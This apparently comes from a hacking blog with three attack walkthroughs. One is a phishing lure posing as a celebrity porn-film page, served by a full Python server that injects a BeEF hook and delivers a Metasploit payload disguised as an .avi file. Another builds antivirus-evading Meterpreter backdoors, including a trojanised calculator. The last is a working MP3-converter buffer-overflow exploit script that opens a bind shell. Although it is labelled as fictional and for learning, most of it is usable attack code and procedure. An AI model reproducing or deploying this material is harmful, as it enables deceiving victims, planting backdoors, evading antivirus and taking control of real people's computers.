Showing posts with label Remote. Show all posts

Friday, March 9, 2012

FAKE FILM ARTIS INDONESIA Feat BEEF AND METASPLOIT

This content is fictional and intended for learning.

The scenario:
  1. The attacker uses social engineering (a social network, chat or e-mail) to send the victim a link to a web page that carries the BeEF hook and the Metasploit payload.
  2. The victim opens the page and downloads the payload file.
  3. The attacker gets a BeEF session as soon as the hooked page is opened, and a Metasploit backdoor once the victim runs the payload.
Let's build the BeEF hook page: a fake web application advertising a porn film. Read the script carefully!


The script
What does it look like?
The fake web page carrying the BeEF hook and the Metasploit payload
Let's generate the payload, named tyas.avi.


Making the payload
The result...
The "sexy" payload is ready
The hook file...
Hook file
Now the social engineering ("soceng") part: spread the news about this celebrity's porn film on social networks, microblogs, SEO, e-mail, chat, SMS, etc.
Next, open BeEF on the attacker's machine.

BeEF login
Wait for the victim to open the page... OK, the victim opens the hooked page; now look at your BeEF console.


Connected with the victim.
Next, the victim downloads the "film". What is the victim thinking? It is a fake file: the .avi name is only the lure, the file itself is the Metasploit payload.



The victim downloads the file
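As an added example (not part of the original post), here is a minimal lure page server in Python that does what the screenshots show: it serves the fake film page with the BeEF hook script tag and the download link, and logs which client fetched the page and which client fetched the payload. The BeEF host 10.0.0.1, the listen port 8080 and BeEF's default hook URL on port 3000 are assumptions; the payload file tyas.avi is expected in the directory the script is started from.

```python
"""Serve a lure page that loads the BeEF hook and offers the payload download.

Added example, not code from the original post. Assumptions: BeEF runs on
BEEF_HOST with its default hook script at http://BEEF_HOST:3000/hook.js, and
the payload was generated as tyas.avi in the current directory.
"""
import http.server
import logging
import socketserver

BEEF_HOST = "10.0.0.1"      # assumption: the attacker's BeEF server
PAYLOAD_NAME = "tyas.avi"   # the file name used on the lure page
LISTEN_PORT = 8080          # assumption: where the lure page is served


def build_hook_page(beef_host: str, payload_name: str) -> str:
    """Return the lure HTML: the BeEF hook <script> plus the download link."""
    return f"""<!doctype html>
<html><head><title>Film Artis Indonesia</title>
<script src="http://{beef_host}:3000/hook.js"></script>
</head><body>
<h1>Exclusive video</h1>
<p><a href="/{payload_name}" download>Download {payload_name}</a></p>
</body></html>
"""


class LureHandler(http.server.SimpleHTTPRequestHandler):
    """Serve the hook page at / and the payload file from the current directory."""

    def do_GET(self):
        client = self.client_address[0]
        if self.path in ("/", "/index.html"):
            body = build_hook_page(BEEF_HOST, PAYLOAD_NAME).encode("utf-8")
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            logging.info("hook page served to %s (check BeEF for the new browser)", client)
            return
        if self.path == "/" + PAYLOAD_NAME:
            logging.info("payload %s requested by %s", PAYLOAD_NAME, client)
        super().do_GET()   # static files, including the payload, from the current directory


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s")
    with socketserver.TCPServer(("", LISTEN_PORT), LureHandler) as srv:
        srv.serve_forever()
```

The two log lines correspond to steps 2 and 3 of the scenario: the first request shows up in BeEF as a hooked browser, the second tells you the victim has the payload and the Metasploit handler should be ready.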
What next .... ?
To be continued......

REMOTE CONNECTION USING SOCIAL ENGINEERING ATTACK

Social Engineering Attack
An attack technique that manipulates the target into doing what the attacker wants so that the attacker obtains information and data, for example by using a social network or an e-mail sent to the target so that the target opens a link or a web page; this is known as phishing. In this phase we try it with social engineering and the Social Engineering Toolkit (SET).

Social Engineering Toolkit
 
SET
Generate the payload and set the attacker's IP address (LHOST).

Making the payload and listener
Payload menu; I choose the Meterpreter reverse TCP payload.

Menu
Choose the encoder to try to bypass antivirus (AV); in this session I select shikata_ga_nai and set the listener port.
Encoding
Iteration
Open msfconsole, use exploit/multi/handler, set LHOST and LPORT to the values used for the payload, and run it.

Multi handler in msfconsole
Multi handler
Use social engineering to get the victim to execute the file. Here is the payload on the victim machine (Windows): in this scenario the victim downloads the msf file from a website and saves it in My Documents.
Payload file on the victim target
The victim executes the payload file; look at the Meterpreter session in Metasploit.

Connected
The target is connected and we can download or upload files remotely. A nice backdoor. Because the payload is a reverse TCP connection, it is the victim that connects out to the attacker, so it also works when the victim sits behind NAT or a firewall that blocks inbound connections.

Using msfpayload And msfencode To Bypass AV (Antivirus)

Crafted fake calculator file

The keys is: msfpayload ... | msfencode ...
  
Tools :
Attacker (BackTrack 5 R1, customized, Metasploit)
Victim (Windows XP SP3, WarFTP, Calculator)

Scenario
The victim is running the WarFTP application, so the attacker uses that running FTP server as the way into the machine.
  1. The attacker exploits WarFTP on the victim machine ---> Meterpreter ---> downloads calc.exe from the victim machine to use it as the template for the fake calculator. The fake calculator is the executable produced by generating the payload and encoding it into that template.
  2. Syntax: msfpayload windows/... LHOST=...... LPORT=....... R | msfencode -e <encoder> -c <iterations> -t exe -x /home/calc.exe -o <output.exe> (R makes msfpayload emit raw bytes for the pipe; add -k if the calculator should keep working while the payload runs in a new thread).
  3. The result of generating and encoding the payload is an evil executable.
  4. Sometimes 21 iterations are enough for the evil application to pass 42 fully updated antivirus engines. Keep in mind that shikata_ga_nai is polymorphic but well known, so an iteration count that worked then says little about current AV.
  5. After encoding, upload the evil application to the victim machine.
  6. The victim runs the evil application (the fake calculator) and the connection between attacker and victim is established.
Let's try. First open msfconsole and search for the WarFTP exploit module.
Search exploit
Then choose one of the exploits.
Using exploit
Set the payload.
Set the payload
Use show options to see the information and the options that must be set: the default port is 4444 and RHOST is the target's IP. Then show the targets.

show targets
Then set the target and run exploit.

Set target
Victim's machine
Victims
If the exploitation succeeds you get a Meterpreter session, from which you can download and upload the files you need. At this stage I choose the calculator: download calc.exe from the victim with Meterpreter, to rebuild it with the payload and encoder to bypass the AV (antivirus).

download calc.exe
Calculator in the victim
After download
Let's rebuild the fake calculator with msfpayload and msfencode. You must enter the iteration value: iterating is an msfencode option (-c) that runs the encoder over the payload several times, re-encoding the output each time.

Crafted File
Then upload it to the victim target and exit Metasploit.

Upload File
After Upload on the Victim
Search for and use exploit/multi/handler, show the options and set LHOST and LPORT (they must match the values baked into the payload), step by step as in the picture.


Waiting for the target
The handler is waiting for the victim to execute the calculator.

Evil calculator
The victim runs the evil calculator (the fake calculator).
Let's look at nc.
NC
The connection is established.

Monday, February 20, 2012

FUZZING: DIRECT RETURN MP3-CONVERTER BUFFER OVERFLOW (BASED EXPLOIT)

REMOTE ACCESS TO WINDOWS USING AN EXPLOIT AND A BUFFER OVERFLOW

This time we try fuzzing an MP3 converter (RM-MP3 Converter) that runs on Microsoft Windows XP (the victim). Previously this was discussed and tested on the WarFTP application. The buffer-overflow technique is the same direct-return exploitation as before; the difference is that here we write the fuzzer ourselves instead of using one that already exists in exploit-db.

mp3 converter
Rm-mp3 converter on Windows
 Tools :
Victim: Microsoft Windows XP, RM-MP3 Converter, OllyDbg.
Attacker: BackTrack

OK, let's write a simple fuzzer. The point of writing it ourselves instead of taking one from exploit-db is to understand the fuzzing technique behind a buffer overflow. Below is the first simple fuzzer; it crashes the converter, but the overflow does not yet reach ESP.
Fuzzer1
Crash
You can see the fuzzer cannot overwrite ESP yet, so we increase the fuzzer size; in this session I used 19000 bytes. Run it with python (fuzzername).py ...... Here is my fuzzer and the result after running it.
ESP OverFlow
Then find which bytes of the buffer land in the overwritten register, using pattern_create. The pattern it generates never repeats a 4-byte sequence, so the bytes that show up in a register identify their exact position in the data the fuzzer sent.
pattern_create
Pattern_create output
Look at the pattern_create output in the picture above; next we put it into the fuzzer. Edit the fuzzer like this.
Fuzzer2
Run the fuzzer again and look at the RM-MP3 converter on the victim. The stack at ESP is overwritten with the pattern and EIP holds four bytes of it. Because both contain known pattern bytes, we can find the exact byte offset.

EIP value
Use pattern_offset to calculate at which byte of the pattern_create output the value in EIP sits.
Pattern_offset output
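To show what pattern_create and pattern_offset do internally, here is a small Python reimplementation of both, added as an example (it is neither the post's fuzzer nor Metasploit's own code). It assumes Metasploit's Aa0Aa1... cyclic pattern and an x86 little-endian EIP value; the EIP value in the usage block is constructed from the pattern itself, not taken from the screenshot.

```python
"""Reimplementation of pattern_create / pattern_offset (added example).

Assumptions: Metasploit's 'Aa0Aa1Aa2...' cyclic pattern, and an EIP value
read from OllyDbg as a 32-bit little-endian integer.
"""
import string


def pattern_create(length: int) -> str:
    """Cyclic pattern in Metasploit's order: upper, lower, digit (20280 unique bytes max)."""
    chunks = []
    size = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                size += 3
                if size >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]   # caller asked for more than 20280 bytes


def pattern_offset(pattern: str, value) -> int:
    """Offset of a 4-byte value inside the pattern.

    `value` is either the 4 characters seen on the stack ('Aa3A') or the integer
    shown in EIP (0x41336141); x86 stores it little-endian, so the register value
    is the 4 pattern bytes in reverse order.
    """
    if isinstance(value, int):
        needle = value.to_bytes(4, "little").decode("ascii")
    else:
        needle = value
    offset = pattern.find(needle)
    if offset < 0:
        raise ValueError("value %r is not in the pattern" % needle)
    # every 4-byte window is unique below 20280 bytes, so this is the only hit
    return offset


if __name__ == "__main__":
    pat = pattern_create(19000)   # the buffer size used in the post
    # constructed EIP value: taken from the pattern itself, not from the screenshot
    eip = int.from_bytes(pat[17417:17421].encode("ascii"), "little")
    print("EIP=0x%08x -> offset %d" % (eip, pattern_offset(pat, eip)))
```

If pattern_offset raises, the register does not hold pattern bytes: either the buffer was too short to reach it, or the value was copied from the wrong register or without the little-endian reversal.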
Looking at the picture above, we now know the offsets (17417-17425). Next edit the fuzzer again like this: it writes DEADBEEF at the EIP position as a test. If it works, EIP is under our control.
Fuzzer3
After running the fuzzer.
EIP Undercontroll
Next, edit the fuzzer again, filling in the offset value and adding NOPs (no operation, 0x90) after the return address. A NOP does nothing when executed, so a run of them (a NOP sled) lets execution slide into the shellcode even if ESP lands a few bytes off.
Fuzzer finall
Running the fuzzer again and lets see in the stack.
Stack with Nop
Next, look at the executable modules. People usually choose SHELL32.dll or USER32.dll; I choose SHELL32.dll. Open View ---> Executable modules, double-click the module and search for JMP ESP. Note that the address you find is tied to this exact Windows version, service pack and language: Windows XP has no ASLR, so it stays the same across reboots, but another service pack or language pack will have a different address.
Executable Modules
Search JMP ESP....
JMP ESP
JMP ESP
Replace DEADBEEF in the fuzzer with the JMP ESP address (7C9D30D7, which must be written in little-endian byte order: \xd7\x30\x9d\x7c) and run the fuzzer.
Fuzzer JMP ESP
The stack and the instruction window are full of our \xCC bytes (INT3 breakpoints), so the debugger stops as soon as execution lands in the buffer.
Stack and Memory Instructions
After this, set a breakpoint in the instruction window with F2, or right-click and then Breakpoint ---> Memory, on access, like this.
Memory Breakpoint
Open Metasploit to get the payload. Start the msf web service:
Msfweb service running
Open the browser at 127.0.0.1:55555, filter the modules and choose the payload. Because I want to remote into the victim I choose the bind shell. A bind shell listens on a port on the victim and we connect to it, so it only works if that port is reachable from the attacker (no host firewall or NAT in the way); a reverse shell would avoid that limitation.
Find Payload
Fill in the payload
The payload
OK, we have the payload; put it into the fuzzer (edit the fuzzer again :) and run it. Let's see the result by running telnet from the console on the attacker (BackTrack 5 R1): we have successfully got a remote shell on the victim.
Fuzzer with payload
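The finished buffer described above, rebuilt in Python as an added example (not the post's fuzzer). It uses the post's numbers (19000 bytes, EIP at offset 17417, JMP ESP at 0x7C9D30D7) and assumes that the converter reads the buffer from an .m3u playlist file, that ESP lands in the bytes right after EIP, and that NUL, LF and CR are bad characters for a line-oriented playlist parser; the shellcode is a placeholder of INT3 breakpoints, to be replaced with the bind-shell payload taken from Metasploit.

```python
"""Build the direct-return overflow buffer for the RM-MP3 converter (added example).

Values from the post: 19000-byte buffer, EIP at offset 17417, JMP ESP at
0x7C9D30D7 in SHELL32.dll on that Windows XP box. Assumptions: the input is
an .m3u playlist file, ESP points into the bytes just after EIP, and
NUL/LF/CR are bad characters for the playlist parser.
"""
import struct

TOTAL_LEN = 19000
EIP_OFFSET = 17417
JMP_ESP = 0x7C9D30D7              # only valid for that XP build, service pack and language
BAD_CHARS = b"\x00\x0a\x0d"       # assumption for a line-oriented playlist parser
NOP_SLED = b"\x90" * 16           # absorbs ESP landing a few bytes after EIP
# Placeholder, as in the post's test run: INT3 breakpoints. Replace with the
# bind-shell payload generated by Metasploit.
SHELLCODE = b"\xCC" * 400


def bad_chars_present(data: bytes, bad: bytes = BAD_CHARS) -> set:
    """Return the set of bad byte values found in `data` (empty set means clean)."""
    return {b for b in bad if b in data}


def build_buffer(shellcode: bytes = SHELLCODE, total_len: int = TOTAL_LEN) -> bytes:
    """junk | EIP -> JMP ESP | NOP sled | shellcode | filler, padded to total_len."""
    junk = b"A" * EIP_OFFSET
    ret = struct.pack("<I", JMP_ESP)          # little-endian: d7 30 9d 7c
    payload = junk + ret + NOP_SLED + shellcode
    if len(payload) > total_len:
        raise ValueError("shellcode too large for the buffer")
    buf = payload + b"C" * (total_len - len(payload))
    found = bad_chars_present(buf)
    if found:
        raise ValueError("bad characters in buffer: %r" % sorted(found))
    return buf


def write_m3u(path: str, buf: bytes) -> None:
    """Write the buffer as the playlist content; open the file in the converter on the victim."""
    with open(path, "wb") as fh:
        fh.write(buf)


if __name__ == "__main__":
    write_m3u("crash.m3u", build_buffer())
    print("wrote crash.m3u (%d bytes)" % TOTAL_LEN)
```

Run it, copy crash.m3u to the victim and open it in the converter under OllyDbg: with the INT3 placeholder the debugger should break right after JMP ESP, which confirms the layout before the real shellcode goes in. The bad-character check is the step that most often explains a payload that "lands" but never runs: a single 0x00 or 0x0a in the shellcode truncates or mangles the buffer before it reaches the stack.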
Telnet
Let's make a directory on the victim's drive.
Make a directory
The directory on the victim
So HOT .... :)